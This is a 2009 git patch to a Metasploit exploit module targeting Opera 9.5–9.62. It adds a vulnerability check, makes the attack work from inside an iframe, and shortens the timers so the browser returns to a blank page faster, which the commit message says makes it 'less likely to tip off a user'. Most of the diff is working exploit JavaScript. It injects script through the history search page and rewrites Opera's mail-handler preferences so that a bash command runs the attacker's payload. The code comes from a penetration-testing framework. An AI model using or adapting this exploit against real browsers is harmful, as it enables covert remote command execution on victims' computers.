From c29af0197a42bbe867ae4a7292cbac6fa9c14dd0 Mon Sep 17 00:00:00 2001
From: James Lee <James_Lee@rapid7.com>
Date: Tue, 28 Jul 2009 11:08:50 +0000
Subject: [PATCH] make opera_historysearch work in an iframe and speed it up so
 it is less likely to tip off a user

git-svn-id: file:///home/svn/framework3/trunk@6915 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../multi/browser/opera_historysearch.rb      | 22 ++++++++++++-------
 1 file changed, 14 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb
index efb2ff07b9..500f4479a7 100644
--- a/modules/exploits/multi/browser/opera_historysearch.rb
+++ b/modules/exploits/multi/browser/opera_historysearch.rb
@@ -22,7 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		:ua_name    => HttpClients::OPERA,
 		:javascript => true,
 		:rank       => ExcellentRanking, # reliable command execution
-		:vuln_test  => nil,
+		:vuln_test  => %Q{
+			v = parseFloat(opera.version());
+			if (9.5 < v && 9.62 > v) {
+				is_vuln = true;
+			}
+		},
 	})
 
 	def initialize(info = {})
@@ -115,7 +120,6 @@ class Metasploit3 < Msf::Exploit::Remote
 					s.src="opera:config";
 					s.id="config_window";
 					document.body.appendChild(s);
-					setTimeout(function () {location.href='about:blank'},1000);
 					config_window.eval(
 						"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
 						"old_app = opera.getPreference('Mail','External Application');" +
@@ -124,11 +128,11 @@ class Metasploit3 < Msf::Exploit::Remote
 						"opera.setPreference('Mail','Handler','2');" +
 						"app_link = document.createElement('a');" +
 						"app_link.setAttribute('href', 'mailto:a@b.com');" +
-						"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},500);" +
-						"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},500);" +
-						"setTimeout(function () {location.href='about:blank'},500);" +
 						"app_link.click();" +
+						"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
+						"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
 					"");
+					setTimeout(function () {window.location='about:blank'},1);
 				}
 
 		when /[?]history/
@@ -148,10 +152,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}")
 
 			js = %Q^
-				window.onload = function() { 
-					url = location.href;
-					location.href = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--"; 
+				var wnd = window;
+				while (wnd.parent != wnd) {
+					wnd = wnd.parent;
 				}
+				url = location.href;
+				wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--"; 
 				^
 			content = %Q^
 				#{html_hdr}